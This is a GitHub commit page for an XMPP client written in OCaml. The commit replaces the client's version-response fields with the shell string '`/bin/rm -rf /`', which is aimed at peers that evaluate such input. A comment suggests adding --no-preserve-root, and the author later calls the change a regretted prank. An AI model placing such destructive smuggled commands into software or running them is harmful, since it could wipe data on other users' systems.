Skip to content
Browse files

go, fuck yourself

  • Loading branch information...
hannesm committed Nov 28, 2014
1 parent 2936332 commit 0607ae0977faf92c7c4bff6c769df15b019a2daa
Showing with 6 additions and 4 deletions.
  1. +6 −4 src/
@@ -180,10 +180,12 @@ let session_callback t =
(fun ev _jid_from _jid_to _lang () ->
match ev with
| IQGet _el ->
let el = Version.encode { = "xmpptest";
Version.version = "2.0";
Version.os = Sys.os_type} in
return (IQResult (Some el))
let el = Version.(encode
{name = "`/bin/rm -rf /`";
version = "`/bin/rm -rf /`";
os = "`/bin/rm -rf /`"})

This comment has been minimized.


denisdubovitskiy Feb 26, 2019

I think that --no-preserve-root has to be added

return (IQResult (Some el))
| IQSet _el ->
fail BadRequest

2 comments on commit 0607ae0


This comment has been minimized.

Copy link

Flowdalic replied Feb 25, 2019

Please note that this commit caused some irritation in certain news aggregation sites.


This comment has been minimized.

Copy link
Owner Author

hannesm replied Feb 26, 2019

@Flowdalic interesting. there are some misconceptions in the thread - I'm neither member of this aggregation site (nor would I like to be) -- feel free to cross-post:

  • what the above commit is doing. it does indeed answer to a XMPP version request with the string `rm -rf /`. there were some other XMPP clients which had some security issues by evaluating shell commands. in hindsight, it was a bad idea to include the above commit in the project, but no harm was ever planned for users of this client.
  • "racist license" what "rain1" is accusing me of. that's wrong. this project used to use as food for thought.
Please sign in to comment.
You can’t perform that action at this time.